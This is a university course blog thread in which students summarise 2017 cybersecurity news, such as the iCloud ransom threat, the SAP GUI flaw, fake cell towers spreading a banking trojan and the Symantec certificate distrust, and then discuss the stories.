MIS 5214 - Section 001 - David Lanter
March 22, 2017 by David Lanter 63 Comments
Binu Anna Eapen says
March 22, 2017 at 12:31 pm
Apple Devices: 300 million iCloud accounts at risk
The report states that a group of hackers named Turkish Crime Family have claimed that they have access to over 300 million iCloud accounts and is threatening Apple to remotely wipe data from millions of Apple devices unless Apple pays it $75000 in crypto-currency: Bitcoins or Ethereum or $100000 worth iTunes gift cards.
While the claims are still not really confirmed, the hackers have given Apple the deadline of April 7th to pay the ransom.
The article goes on to suggest what an iCloud account holder can do to protect their account from hackers. If the hackers really do have access to iCloud account they can easily access photos and private data. In the past also icloud accounts were hacked refering to the incident in 2014 which led to the Fappening, wherein hackers flooded the internet with nude photos of hundreds of celebrities, which were stored in their ICloud account. To prevent it, users are adviced to reset their password immediately and enable two step authentication to add an extra layer of security to their account.
Younes Khantouri says
March 26, 2017 at 4:57 pm
Apple has been a good company that makes the best products in my opinion. I think they have to develop themselves and inverst on research to increase their products security levels. I believe that we give our information to so many companies, they can be hacked from one of these companies at any times. Indeed, these companies have to work harder to secure our information.
Noah J Berson says
March 26, 2017 at 11:40 pm
These cloud accounts are often treated as a bank vault by consumers. In reality, they are like mailboxes sitting on the street; locked but accessible to the public. You should assume that anything you put on the cloud can be lost or stolen like how the mail service loses packages from time to time. With a heavier investment, Apple should make it harder for hackers to break in without insider knowledge.
Khawlah Abdulaziz Alswailem says
March 22, 2017 at 3:36 pm
Brain-Inspired System Aims to Improve Threat Detection
A new “brain-inspired” computer system promises improved detection of cyber threats by looking for specific patterns that can more efficiently reveal indicators of compromise in a network.
The system aims to address the limitation current systems have when it comes to the detection of more complex indicators of compromise, which the researchers call “new species of ‘bad apples’.”
The designers of the system explain that many modern cybersecurity systems might be looking for general indicators of compromise or only for specific patterns, and often require interaction with security analysts to correctly sort the real dangers from false alarms.
While conventional detection systems compare the received data against a library of malicious patterns, the Neuromorphic Cyber Microscope was designed to compare streaming data to suspicious patterns in a time-dependent manner, which should improve its detection efficiency.
March 26, 2017 at 11:45 pm
Heuristic scanning relies on past knowledge. This new method seems to get ahead of the curve which is what is needed nowadays with how many possible attackers there are. A trained admin can sometimes tell that something is wrong with a computer before anti-virus even says anything. By using neural networking to learn what threatens a system (assuming thats what they have created) these creators made something very unique.
Said Ouedraogo says
March 22, 2017 at 4:27 pm
Breaking Down Barriers to Information Security Progress
Organizations face many barriers when it comes to running an information security program. Some are quite obvious, such as lack of budget and minimal buy-in. However, the biggest barriers come from inside the organization as
• Individuals inside the organization have a specific agenda, which is often to prevent security initiatives from being pushed through.
• Users are accustomed the culture of, “Management says that security is IT’s problem, therefore it’s not mine to worry about.”
• Security product vendors’ overpromise and underdeliver, perpetuating security risks.
• IT and security staff waste precious time on trivial tasks.
Barriers such as these get in the way of achieving results in security.
One solution is to open the issue with management and then proceed asking the tough questions. These questions might include:
• What’s going on here?
• How is it impacting the business?
• Why do we think this is happening?
• What is currently being done to address the issue?
• What’s required to take the bull by the horns and get this initiative/project on the right track?
• How do we ensure steps are being made in the right direction? When do we do that?
Fred Zajac says
March 26, 2017 at 4:39 pm
Good article. Security is a burden on the business. It makes things more difficult, and loses money through the expense and lose of revenue. Many times an organization will only react to a security breach, and even after the breach is fixed, some will still be reluctant to invest in security, because they feel fixing the issue is going to stop it from happening again.
It’s like this: You decided to wear tennis shoes for a basketball game and fractured your ankle. The doctor puts you in a cast for six weeks, and you fully recover. You continue to wear tennis shoes, rather than basketball shoes because you believe the cast will prevent you from fracturing your ankle again. How about we get basketball shoes. Yes, they may be uncomfortable, and cost more but what good is it if you’re are in a cast for another 6 weeks?
Ming Hu says
March 26, 2017 at 6:44 pm
Great post Said, I believe why security is so burdensome for the organization is that the security vulnerabilities may come from every corner, such as an low level employee or an inconspicuous mistake, while the outside hackers are extremely sophisticated and sensitive to exploit these vulnerabilities to carry out the hack which may cause disastrous loss. So in order to secure their information and information system, more aspects should be paid close attention and each details should be well-controlled which is a huge expense for the organization.
Mengting Li says
March 22, 2017 at 5:55 pm
Google Hands Over Email Encryption App to Community
The technology giant first announced its end-to-end e-mail encryption project in June 2014 and released its source code in a few months. The goal is to create a Chrome extension that allows fewer skilled users to use the OpenPGP standard to encrypt their e-mail.
End-to-end encryption libraries have been used for multiple projects, including E2EMail, a Gmail client that runs independently of the normal Gmail interface, allowing users to send and receive encrypted e-mail.
Over the past year, E2Eail’s source code has been provided on GitHub and has been contributed by several security engineers. Search giant now announced that E2EMail is not a Google product, but rather a “completely community-driven open source project.”
“The current E2EMail is tested using a bare metal central key server, but recent key transparency announcements are critical to its further development,” Google employees said in a blog post. “Key discovery and distribution is at the heart of the usability challenge that OpenPGP implementation faces. Key Transparency provides a solid, scalable, and practical solution that replaces the problematic trusted web page model that traditionally works with PGP.
March 26, 2017 at 11:50 pm
Email was designed rather early on as far as the internet goes so safety and privacy weren’t in the design specifications. Email has to travel over many different 3rd party connections (relative to the sender and receiver). Some services that attempted to create a more secure email, like Lavabit, have been shut down for being too secure. I think Google won’t get into trouble here since they are one of the largest companies in the world.
Seunghyun (Daniel) Min says
March 23, 2017 at 12:40 pm
Hackers Using Fake Cellphone Towers to Spread Android Banking Trojan
I have found an interesting article which hackers have found more sophisticated and deceptive way to spread malware. Chinese Hackers have taken SMiShing attack to the next level, using fake cell phone towers to distribute Android banking malware via spoofed SMS messages. (SMiShing – phishing attacks sent via SMS) Security researchers at Check Point Software Technologies have announced that Chinese hackers are using fake base transceiver stations (BTS towers) to distribute “Swearing Trojan,” This is the first ever reported real-world case in which attackers played smart in such a way that they used BTS – a piece of equipment usually installed on cellular telephone towers. Once the malware installed in victims’ devices, the Swearing malware distributes itself by sending phishing SMSes o a victim’s contacts. However, the maximum range of a BTS antenna may be as low as 10-22 miles, the technique is very successful and sophisticated in targeted attacks. More interesting about the Swearing malware is that to avoid any malicious activity detection, the Swearing trojan doesn’t connect to any remote command-and-control (C&C) server. Instead, it uses SMS or emails to send stolen data back to the hackers. Check Point researchers are also warning people outside of China because they won’t be free from this attack once adopted by western malware.
Yulun Song says
March 26, 2017 at 4:03 pm
Nice post Daniel. This article illustrated that there is an increasing number of new ways or new technologies of cyber attacks. With this, companies should increase cyber security level to protect its data and sensitive information. For IT auditors, they should not only repeat old reports, but need to establish more controls for new challenges.
Zhengshu Wu says
April 9, 2017 at 4:42 pm
Cellphones should not blindly trust anything that appears as a cell tower. Why isn’t there an authentication layer? One possible setup is to mimick the TLS client-certificate system. Trusted carriers could provide SIM manufacturers the public keys of their cell towers. The phones would only connect to the matching towers.
Mustafa Aydin says
March 23, 2017 at 4:20 pm
More than 70 Percent of Mobile Devices on the Five Major US Carriers Highly Susceptible to Breach
An analysis by Skycure of the patch updates among the five leading wireless carriers in the United States found that 71 percent of mobile devices still run on security patches more than two months old.
The company’s Mobile Threat Intelligence Report also found that six percent of devices run patches that are six or more months old. Without the most updated patches, these devices are susceptible to myriad of attacks, including rapidly rising network attacks and new malware, also detailed in the report. In tech city centers, Boston topped a list of tech cities with the largest growth in network incidents with a more than 960 percent increase. The report also found that common malware grew by more than 500% from the first quarter to the fourth quarter of 2016.
According to the report:
• The most recent security patch released by Google has only been adopted by a very small percentage of the devices. Skycure reported that AT&T users were up to ten times more likely to have this latest patch installed.
• Among the five major US carriers, MetroPCS had the highest percentage of devices with patches more than three months old, making their devices the most susceptible to attack.
• Stand-alone protection above and beyond the integrated protections with the EMM
• Among all the major carriers, more than one-third of devices had patches more than three months old. Google releases Android security patches every month, meaning these devices are at least three patches behind, exposing vulnerabilities on these devices ripe for hackers.
The report found:
• The volume of incidents rose dramatically from the first quarter to the fourth quarter of 2016, ending Q4 with more than three times the number of incidents of Q1.
• Boston had the greatest increase in incidents throughout the year, reaching nearly 11 times the number of incidents from the first to fourth quarter, followed by Chicago, Raleigh-Durham, and Washington DC.
The Skycure report details and defines the most common types of malware, and found:
• The most common types of malware are: adware, hidden apps, potentially unwanted apps, riskware, spyware, and trojans.
• The number of these common types of malware grew by more than 500% from Q1 to Q4 of 2016.
• Among the common types of malware, hidden apps ended the year with the fastest growth in 2016.
March 26, 2017 at 5:09 pm
I like your post.
Your article pointed an important thought of how so many companies that sell us services and products don’t care about our infomation security. Indeed, these companies should work harder to insure that their clients information are secured.
Mansi Paun says
March 24, 2017 at 12:10 am
Unpatched SAP GUI exposes systems to malware attacks dur to RCE velnerability
ERPScan security researchers warn that the SAP GUI (Graphical User Interface) exposes unpatched systems to malware attacks such as ransomware due to a remote code execution (RCE) vulnerability.
SAP was informed of the flaw in December 2016, when the flaw was discovered however,a fix was released only as part of SAP’s March 2017 security updates. The flaw was found in SAP GUI for Windows 7.20 to 7.50, and was assessed with a High severity rating having a CVSS(Common Vulnerability Scoring System) Base Score of 8.0.
The SAP GUI offers remote access to the SAP central server in a company network. An attacker would have to use special ABAP code to exploit the vulnerability and bypass SAP GUI security policy to execute the code,
As per ERPScan, the vulnerability could allow access to arbitrary files and directories located in an SAP-server filesystem , including an application’s source code, configuration, and critical system files. Attackers could use the bug to obtain critical technical and business-related information stored in a vulnerable SAP-system.
The security researchers explained that regsvr32.exe can be used to load DLL files from a remote SMB share and execute DllMain function. It has also been revealed that SAP GUI has a rule which allows reading, writing, executing of regsvr32.exe Windows application without the security prompt,” ERPScan explains. By exploiting this vulnerability, an attacker can force all the SAP GUI clients within a company to automatically download a malware that locks workstations and demand money in exchange to regain control of their systems.
An attacker can create a malicious transaction and then simply compromise the SAP Server to put the transaction into autoloading.
“Each time a user logins to the infected SAP server using SAP GUI, the malicious transaction will be executed calling a program on an endpoint that downloads the ransomware. Next time a user tries to run an SAP GUI application, the malicious transaction will be executed and prevent from logging on SAP Server. Once an attacker manages to compromise a system, however, they can execute any command remotely (the command is running with the privileges of the service that executed the command). This means that an attack where a ransom is demanded in exchange of regaining access to the affected systems is only one of the possible scenarios the flaw can abused in. Ransomware, however, remains one of the easiest ways to mass exploit the bug for financial gain.
Affected customers are advised to apply the released patch as soon as possible on each and every PC on the network, as well as implementing a vulnerability management process to continuously monitor, identify, evaluate, and mitigate vulnerabilities.
Source : http://www.securityweek.com/sap-vulnerability-exposes-enterprises-ransomware-other-attacks
Paul Linkchorst says
March 24, 2017 at 8:56 am
eBay Asks Users to Downgrade Security
According to the article found on KrebsonSecurity, there has been a recent change to how eBay handles multi factor authentication. Prior to the recent change, eBay offered an out of band token that generated a unique six-digit code which expires every thirty seconds to log into the account. However, eBay is now encouraging individuals to switch to utilizing an SMS-based two-factor authentication. The reasoning for the switch is cited to be that eBay is trying to improve upon their multi-factor authentication program and bring it in-house as opposed to likely utilizing a third party software as an authentication service.
This is an interesting switch in how security is being approached. On one end, utilizing a sms based two factor authentication can provide 2 layers of security if the cellphone/smartphone receiving the SMS is password protected. This is mostly achieved by biometrics and passcode locks on a smartphone. However, on the other end, SMS based two factor authentication is more susceptible to being intercepted either through social engineering or exploiting cell-phone protocols. On top of this, according to Brian Krebs, NIST recently addressed in their Publication 800-63B that they suggest that SMS two-factor authentication to be phased out. It is an interesting discussion as to why to implement one form of second authentication or the other, as there can be arguments that SMS two-factor is more inviting to new users of two-factor while out-of-band two-factor is more secure. Regardless, the business decision will not appease everyone.
On a last note, Brian Krebs sites a website called twofactorauth.org. This website identifies all sorts of products or services that offer two-factor authentication. As I reviewed the website, i was appalled at just how many banks offer no two-factor authentication. As someone who is looking to switch banks, this will be a part of my consideration.
March 26, 2017 at 11:57 pm
It took a while to understand why this was a security downgrade as I didn’t first think of the ways someone could intercept your text messages. There was probably a cost factor to this decision as sending out sms messages is cheaper than sending out physical fobs to each customer. Lately I have seem one-time password (OTP) options as apps for the phone. If someone is security-minded, they should lock their phone down as well to prevent this vulnerability. Both methods are susceptible to a stolen phone that is able to be unlocked.
April 9, 2017 at 4:47 pm
I’d like to see laptops (& desktops) get built-in fingerprint scanners, like iphones have. You could then use your finger to login where ever without all this nonsense. Perhaps have a password as backup in case your finger isn’t available.
Brou Marie Joelle Alexandra Adje says
March 24, 2017 at 9:17 am
The Biggest Cybersecurity Threats Are Inside Your Company
The article I read is about the real cause of cyber security in a company. In fact, the article mentioned that no matter the size or the scope of a breach, usually it’s caused by an action, or failure, of someone inside the company ( according to IBM 60% of all attacks in 2016 were carried out by insiders). The most dangerous aspect of insider threats is the fact that the access and activities are coming from trusted systems, and thus will fly below the radar of many detection technologies. Thus, managers must be aware of what to look for and how to focus their security efforts to get the greatest returns on protection. Key points to focus on are:
1. Focus on the right assets.
2. Apply deep analytics
3. Know your people
4. Don’t forget the basics
Wen Ting Lu says
March 25, 2017 at 8:54 pm
I believe the biggest threat to an organization are employees. A research has conducted that 70 percent of the healthcare organizations and business associates surveyed identified employee negligence as a top threat to information security. And an article earlier this year in Federal Times noted, “Every survey of IT professionals and assessment of cybersecurity posture shows AT LEAST 50 percent of breaches and leaks are directly attributable to user error or failure to practice proper cyber hygiene.” As that being said, companies should spend more effort and time on employee background checks and employee training to ensure that all the employees are aware of the importance of data security.
Joshua Tarlow says
March 26, 2017 at 4:19 pm
I’ve read that two and definitely agree that employees can be an organizations largest threat. I recently read a surveyed by PEW about the lack of knowledge of basic security principles for the average person. Other than identifying a strong password, most did not know other basic security practices. This lack of knowledge and awareness can be very problematic at a company.
Priya Prasad Pataskar says
March 24, 2017 at 2:46 pm
Is Encrypted data at risk too?
A Kentucky-based Med Center Health issued a public notification confirming that their patient data was breached. The chain of hospitals determined that an employee had obtained critical data by making it appear that he needed it for official task. This was done by an former employee in 2014. However, during the review in 2017 it was noticed that the employee had allegedly obtained patient information on encrypted CD and USB for his own purpose. The billing data stolen included patients’ names, addresses, Social Security numbers, health insurance information, diagnoses and procedure codes and charges for medical services. Further investigation led to knowing that the employee had gathered the information to as he intended to use it in developing a software for outside business interest.
On March 1 reported to the U.S. Department of Health and Human Services that the breach affected 697,800 individuals and involving an unspecified “theft and reports as the largest incident added to the HHS so far in 2017.
Privacy attorney Kirk Nahra states that if the company is compliant with PCI standards the data would be encrypted and by law only unencrypted and unredacted computerized data that compromises the security, confidentiality, or integrity of personally identifiable information.
To avoid a breach of the confidential key, the decryption tools should be stored on a device or at a location separate from the data they are used to encrypt or decrypt. The individual who stole data would have had access to a decryption key or other means of accessing the encrypted data – or he stole the data before it was encrypted must be investigated.
March 26, 2017 at 3:18 pm
Interesting article that you posted. I think the most interesting part of the article was reading about HIPAA’s Breach notification rule. The ruling identifies that a breach is “an impermissible use or disclosure under the Privacy Rule that compromises the security or privacy of the protected health information”. Depending on who the unauthorized personnel, the extent and quantity of the health information involved, and whether the entirety of the health data was acquired/viewed all pertain in identifying if a leak of information is considered a breach. This makes sense since if a single patient’s medical condition was leaked to a unauthorized individual, it might be an illegal disclosure in regards to HIPAA but not a data breach.
However, there are three exclusions to the definition of a “breach”.
1. The disclosure or acquisition was made in “good faith” by a workforce member
2. The inadvertent disclosure of information from one health professional/workforce member to another health professional/workforce member.
3. If the unauthorized person was not able to retain the information, then it is not considered a breach
These three exclusions make the situation in your article quite interesting since the exposure was done by an inside employee and would have been classified as the inadvertent disclosure of information from one health professional to another. Overall I am glad that this data breach was released and those affected were notified.
Arkadiy Kantor says
March 24, 2017 at 3:47 pm
I thought this article was interesting because it focused on the social aspect of security. It talks about how most people are not aware of suber security risks and they are not properly trained. The Article suggests that we have a dangerous mindset about cyber security and it can pose a huge threat. Despite all the recent major breaches in both the private and political sectors people have very little knowledge or self-awareness of the security implications. I think these are very good points and people are relying on technology to protect themselves from threats which leaves us very vulnerable to social threats.
March 26, 2017 at 4:11 pm
This article is a good reminder for people. I also read a couple similar articles before. There are still tons of companies that do not have awareness training or passwords integrity controls for their sensitive accounts and data areas. As a video i watched before, people still write down their passwords on their office desk or put them on the wall. and there are many people who still use their pets names or family members as their passwords. I think companies should really have training on these areas and creating a strong security awareness for their employees.
March 26, 2017 at 4:17 pm
Definitely agree that companies should increase awareness training. And some practices such as taping passwords to a desk are never accessible. However, not always realistic to expect the average person to be able to remember a different password for every application and with an adequate complexity level. Personally, not sure the industry has established a suitable alternative to passwords yet. But still not excuse for inadequate security practices
March 24, 2017 at 3:57 pm
“The Cybersecurity Industry Is Failing: Time to Get Smart About ‘Dumb’ Homes”
The article discusses the current lack of security in many connected devices and how companies producing these products have failed consumers. It notes that it is not realistic to expect all consumers to secure these devices independently or have all of the technical knowledge. The companies should play a larger role and make the devices more secure, including preemptively doing things such as changing the default password to minimize the risk for the consumer.
March 26, 2017 at 5:15 pm
My post was talking about how Hackers can use our smart TV’s at home to watch and listen to what we do inside our homes. I do believe that most of the companies that sell us services or product don’t work hard enough and don’t invest to secure our information and devices.
Yang Li Kang says
March 27, 2017 at 12:36 am
I think that companies may be prioritizing the security in their own company internally and either forgetting to secure their products or choosing to neglect it because it increases the cost.
Vaibhav Shukla says
March 25, 2017 at 2:14 pm
Third-Party App Store Slips Inside iOS App Store
A third-party app store application managed to slip into the official iOS App Store by masquerading as a legitimate financial helper application, according to Trend Micro researchers.The third-party store can be used to install not only applications in the official iOS App Store, but also those that are distributed via unofficial channels, thus potentially exposing users to mobile malware and other unwanted applications. One of the programs distributed via this portal is “PG Client,” a tool for jailbreaking iOS devices
The app also uses a third-party SDK called TalkingData to gather information about the user’s behavior. The SDK has many aggressive API calls and can acquire various information about the user’s system, such as the Wi-Fi network name, running processes, and IP address. On jailbroken devices, it can also gather the user’s Apple ID and installed apps.
March 26, 2017 at 3:37 pm
From the articles I have been reading, it seems that the most common form of malware for mobile operating systems are that of Trojans. I would imagine that is the case since unless an iPhone is jailbroken or android phone allows third party applications on the device, then the only way users will be able to download such malware will be through the official application stores. Since all mobile applications on the IOS app store are reviewed, and I believe most Android are as well, this means that an attacker needs to mask their true intentions with some sort of fake functionality. I do think that we will see an increase into the amount of mobile malware attacks. Phones nowadays have all sorts of information on it, such as employer emails, bank account information, photos, and even password managers. Since the “loot” is beginning to grow on mobile devices, so will the creativity of cyber attackers in trying to get it.
March 25, 2017 at 3:32 pm
Android Forums Suffers Data Breach
The article I read this week talks about Android Forums, one of the most popular online Android communities’ server that hosting its website has been breached, which allowing attackers to access some user information.
According to representatives of Neverstill Media, which maintains Android Forums, hackers managed to access information on 2.5 percent of active users. This included one staff member and 40 users who registered accounts between 2016 and 2017. The compromised data includes email addresses, hashed passwords and salts. In addition, leading developers believe that those compromised accounts never posted anything on Android Forums are bots.
The accessed information can be leveraged for spam and phishing campaigns. Affected users have been notified via email and instructed to change their passwords. The vulnerability exploited by the attackers has been patched and various security improvements are being made to prevent incidents in the future.
Yu Ming Keung says
March 26, 2017 at 4:08 pm
Hey Wen Ting, interesting post. normal users of forums won’t share their sensitive information but they most likely use the same passwords for different accounts, including banks, universities, work place. It is relatively easier for the hackers to obtain and steal other sensitive information by using the information stolen from the android forum. I would strongly recommend these affected users to change their passwords on other accounts.
March 26, 2017 at 6:19 pm
I definitely agree with you! Once the hacker obtains the account information on one social media platform, they will test it on the other accounts that users have because it is very likely people are re=using the same username and password for multiple accounts. People tend to use the same account information (username and password) for all the accounts they have because it is convenient and easy to remember. However, for security purposes, it’s not a very smart decision. People should use unique and strong password for different accounts.
Jianhui Chen says
March 26, 2017 at 8:09 pm
good post Wenting,
This article remind of the article I have read “Why a billion Android phones will never be safe”
nearly a billion phones being vulnerable to hacking, major phone makers that rely on the operating system — Samsung, Google, Sony, LG, and more — announced plans to start issuing monthly bug fixes for their phones. The news is certainly timely, but it’s not going to fix a thing. Android is the most vulnerable OS to bugs, hacks, glitches, and issues of any kind, and no update program from Samsung and LG is going to change that, regardless of what you may read.
March 25, 2017 at 11:09 pm
One of the most valued right in America is the right to Privacy. This is essential in a market economy. If we don’t allow for private property, then it is government property and called a communism. We can argue what is best for it’s society, but American’s cherish the idea of being able to talk on the telephone without the fear of the government listening in, unless they have a warrant, which requires a good reason.
Well, things have changed since terrorist attacks have ravished our land, and others across the world we call home. Since then, the government has been given the freedom to investigate techniques on hacking iphones, smart appliances, and other devices that can be used to track and monitor someone. WikiLeaks released documents that showed the CIA had the capabilities to hack into peoples equipment and track them without their knowledge. Even if the system was wiped and re-installed.
This is freaking some people out, but isn’t it a good thing that our CIA has the capabilities to do this? The WikiLeaks report never mentioned the CIA using these technologies on anyone, but I have to say that I am glad the CIA has the tools to spy on a would-be-terrorist.
Would you be happy if the CIA identified a terrorist in Philadelphia who was plotting to kill people? Oh wait, they did… Colleen LaRose A.K.A Jihad Jane.
March 26, 2017 at 6:48 pm
Thanks for sharing the news, Fred!
I am also pleased that the CIA has the tools to investigate terror suspects. Although we have to give up some privacy when talking on the phones, people might feel uncomfortable because they are being monitored. But in general, it is worthwhile if CIA can get any suspicious behavior of terrorists.
Wenlin Zhou says
March 26, 2017 at 10:30 am
Could Killing of FCC Privacy Rules Lead to End of Net Neutrality?
The Senate on Thursday voted 50-48 to overturn new FCC rules that would prevent ISPs from monetizing customers’ information without their consent. The rules, passed during the Obama administration in October 2016, were due to come into force earlier this month, but were delayed by new Republican chairman Ajit Pai.
This delay provided time for Republican senators to propose a Joint Resolution to ‘disapprove’ the new FCC rules. S.J. Res. 34 was adopted along party lines. It ‘disapproves’ the FCC rule “Protecting the Privacy of Customers of Broadband and Other Telecommunications Services… and such rule shall have no force or effect.”
The ISPs are not happy with this, and have been complaining and lobbying to get it reversed. “The unfortunate result of the FCC’s extreme regulatory proposals,” wrote Comcast in March 2016, “will be more consumer confusion and less competition — and a bunch of collateral damage to innovation and investment along the way. This is most disappointing because it is entirely avoidable, since the Administration, the Federal Trade Commission, and others have examined this issue and marketplace for many years and have reached very different conclusions.”
In short, the FCC grabbed regulatory control of ISPs from the FTC in order to enforce net neutrality, but in doing so also became responsible for privacy. The effect was to place different internet giants (such as Comcast, Verizon and AT&T) under different regulations to others (such as Google and Facebook). The latter are allowed to monetize customer data, while the former are not.
March 26, 2017 at 12:48 pm
The article I read for this week is called “Apple Ransom Threat: Legitimacy is Elusive.” This article talked about that a hacking organization identifying itself as the Turkish Crime Family has gone hunting for a very big fish: It said that it has credentials for hundreds of millions of Apple accounts of various sorts (including email and iCloud), and it is threatening to wipe all of the iPhones in the cache unless a hefty ransom is paid. This group is asking for either $75,000 in Bitcoin or $100,000 in iTunes gift cards before the April 7 deadline. It is a major shakedown-but is it legitimate? If this is legit, the hackers would have had to obtain access to the individual user accounts via breaking the passwords of each the user accounts or have acquired access to the Apple iCloud servers, and the access to each user account is much more realistic since we have seen numerous reports of all the weak passwords people user for their computer and accounts. Apple users should make sure they are using strong passwords and enabling two-factor authentication as an added protection. For bounded credit cards information, Apple and banks should increase its security level for safety.
March 26, 2017 at 8:12 pm
Thanks for sharing, Yulun,
Before reading this article, I never realized that the likelihood of a mass remote wipe of iPhone data is unknown, though there is reason to be skeptical. The Apple spokesperson said that Apple is ” actively monitoring to prevent unauthorized access to user accounts and are working with law enforcement to identify the criminals involved. To protect against these type of attacks, we always recommend that users always use strong passwords, not use those same passwords across sites and turn on two-factor authentication.”
Deepali Kochhar says
March 26, 2017 at 1:47 pm
BEC Sours again as Fraudsters target employees
Business Email Compromise (BEC) attacks jumped 45% in the final quarter of 2016, compared to the previous three months. These attacks have grown both in volume and sophistication. Also known as “CEO fraud” and “whaling”, these attacks typically involve fraudsters spoofing the email addresses of company CEOs to trick staff members into transferring funds outside the company. Some of them also include attempts to target HR teams for confidential tax information and sensitive employee data, as well as engineering departments which may have access to a wealth of lucrative corporate IP.
In its analysis of over 5000 global enterprise customers, it claimed that in two-thirds of cases the attacker spoofed the “from” email domain to display the same as that of the targeted company. These attacks are a combination of this domain spoofing and social engineering of the victim to force them to pay up.
It is claimed that firms in the manufacturing, retail and technology sectors are especially at risk, as cyber-criminals repeatedly look to take advantage of more complex supply chains and SaaS infrastructures.
When it comes to BEC attacks, employees should never be an organization’s first line of defense. It is the organization’s responsibility to ensure that security technologies are in place, so that BEC attacks are stopped before they can reach their intended target.
March 26, 2017 at 4:02 pm
Vulnerabilities Found in Popular Solar Park Monitoring System
Several potentially serious vulnerabilities were discovered in solar park monitoring system. solar park monitoring system is known for solutions for energy meter monitoring and solar power generator monitoring applications. The infected company says its products have been used to monitor more than 260,00 solar plants worldwide.
An advisory published on Wednesday by SEC Consult shows that the firm has identified a total of seven vulnerabilities. The security holes have been discovered after testing Solar-Log 1200 devices running firmware version 3.5.2-85 and Solar-Log 800e with firmware version 2.8.4-56. Another flaw allows an unauthenticated attacker to upload arbitrary files to the Solar-Log system using specially crafted POST requests. Another vulnerability is that the hackers are allowed to obtain potentially sensitive information with the flaw of IPC@CHIP.
The vendor claimed that they have reacted fast to address the issue with the release of newest firmware vision. However, SEC had no clue to confirm that all flaws have been patched properly. Further investigation will be conducted.
March 26, 2017 at 8:04 pm
Goood post Yu MIng,
Other vulnerabilities are related to the Beck IPC@CHIP embedded controller used by the Solar-Log monitoring devices. One of these flaws, known since 2001 (CVE-2001-1341), allows an attacker to obtain potentially sensitive information on the network configuration.
Other IPC@CHIP-related bugs can be exploited to change network configurations, cause a denial-of-service (DoS) condition, and reprogram the device’s flash memory. While some of the flaws may exist due to outdated IPC@CHIP software/firmware, SEC Consult pointed out that some attacks are possible because Solar-Log has failed to implement password protection functionality made available by Beck.
The information disclosure, CSRF and arbitrary file upload vulnerabilities can be exploited over the Internet is most cases, while the other weaknesses can be exploited by an attacker with network access to the devices, SEC Consult told SecurityWeek.
March 26, 2017 at 4:47 pm
Smart TV Manufacturers Do NOT Want You To See This Youtube Video.
I was very impressed when I watched this YouTube video that talks about how intelligence agencies can use our appliances at home to watch us and see what we do.
Smart TVs became dangerous weapons to watch what you do inside your house. CIA can install a Malware in your smart TV to use your TV’s camera and microphone to hear and see what you do in your own house according to Wikileaks. When your TV is plugged to the power is all the CIA needs to watch you and the camera doesn’t even turn the light of notification during the bugging process.
So many people believe CIA does hack the people TVs and probably the computers for fighting against the terrorism activities. It’s very fanny, instead of watching your TV, It’s watching you instead.
March 26, 2017 at 5:27 pm
Hi Younes, it is a very interesting post. I didnt know some TVs nowadays are as advanced as having built-in camera. I have seen people covering up their laptops’ cameras with a piece of tape to prevent begin monitored by the CIA or FBI because they want your information and what is going on with your live. I believe there are numbers of ways that someone can gain access to any built in camera but the manufacturers hold part of the responsibilities to ensure user’s privacy.
March 26, 2017 at 6:58 pm
WoW, it’s an interesting video. We heard that your smart phone or your laptop could be a spying tool, but if the spying tool turns to be smart TV, it is still a new thing, So I wonder if the smart TV is a perfect spying tool? Generally speaking, smart TVs are less likely to receive proper security support. This is in part because users even don’t have the awareness that they could be spied by their smart TV! So they are less likely to use security practices when it comes to their TV, such as changing passwords, regularly update, or installing a charged antivirus software.
March 26, 2017 at 7:06 pm
It’s very interesting you brought this up. I agree with you that it’s kind of ironic instead of you are watching the TV, your TV is watching you. I am okay with being monitored over the phone conversation for investigating terrorist’s activities, but not with someone who is watching what I am actually doing. I believe by install malware on TV strongly invade people’s privacy.
March 27, 2017 at 12:27 am
This is indeed interesting. I’ve heard of spying through laptop webcams but not smart TVs. I guess when everything is turning to IT, cyberattacks can come just from about anywhere.
April 9, 2017 at 4:57 pm
How mad will we be when we find out the manufacturers built back doors into all our gear in concert with “intelligence” services? We didn’t just let them in the front door, we paid thousand dollars for it and installed our surveillance ourselves.
Neil Y. Rushi says
March 26, 2017 at 5:12 pm
Phishing in Gmail
Phishers are using techniques to trick Gmail users from knowing they are falling into a phishing trap. This is done by hiding it as a legit sign-in page. By logging in, they can grab the credentials and use this for malicious activities. This is dangerous especially for those with privileges that carry sensitive because the phishing techniques also hits the other Google products such as PDF. Google is using a machine of learning-based detection to track patterns of this phishing technique. Also, Google is helping administrators provide employees of organizations with security keys as a authentication method. But it’s hard to predict and learn all techniques because phishers always change it up and invent new ideas.
March 27, 2017 at 12:25 am
Interesting. As we know, Temple also uses a similar feature where you access you Gmail through a Temple portal. Unsuspecting users who are used to this kinds of feature may fall victim to the phishing attempt you mentioned, especially the newly employed.
Abhay V Kshirsagar says
Google has stopped trusting Symantec-Issued certificates
Symantec failed to make sure that its partners properly issue digital certificates and thus Google is not pleased and has announced that it will gradually stop trusting all of organization’s existing certificates in its browser Chrome.
In 2015, Google caught Symantec and its subsidiaries and WebTrust audited partners for issuing certificates wrongly and had notified Symantec to resolve an issue that was caused after a subsidiary certificate authority (CA) issued an unauthorized google.com certificates. Recently, Symantec’s GeoTrust and Thawte were found to have wrongly issued over a hundred certificates like test.com, example.com.
According to Ryan Sleevi, a software engineer at Google, Symantec’s partners misused at least 30,000 certificates in the past years. Further, these certificates were issued by CrossCert, Certisign Certificatadora Digital, Certisur S.A and Certsuperior S.
Symantec did authorize the aforementioned companies to perform validation for certificate information but did not thoroughly audited them. According to the Baseline Requirements, Symantec is liable for any issues cause by this. Also, there is no way to tell a difference between a certificate validated by Symantec from that validated by its partners.
Adam M Joskowicz says
March 26, 2017 at 5:16 pm
New brain-inspired cyber security system detects ‘bad apples’ 100 times faster
Cyber Security is critical for national security, corporations, and private individuals. The Neuromorphic Cyber Microscope can look for the complex patterns that indicate specific ‘bad apples’. It can do this all while using less electricity than a standard 60-watt light bulb, due to its brain-inspired design. The Neuromorphic Cyber Microscope, an R&D100 Awards finalist this year, is in the early stages of deployment. It is more than 100 times faster and 1,000 times more energy efficient than racks of conventional cyber security systems. The brain inspiration leads to faster and more efficient threat detection. Both the NCM and the human brain continually scan for threats. “A hose or stick can cause you to jump, even if you’re not searching for a snake. Similarly, the NCM compares streaming data to suspicious patterns in a time-dependent manner.” This technology is taking a giant step in the cyber security world.
March 26, 2017 at 6:00 pm
America’s JobLink Suffers Security Breach
America’s JobLink (AJL) was recently the victim of a security breach when a hacker exploited a flaw in its application code to gain unauthorized access to information of job seekers in 10 states. AJL, a multi-state system which links job seekers with employers, has since identified and eliminated the code misconfiguration.
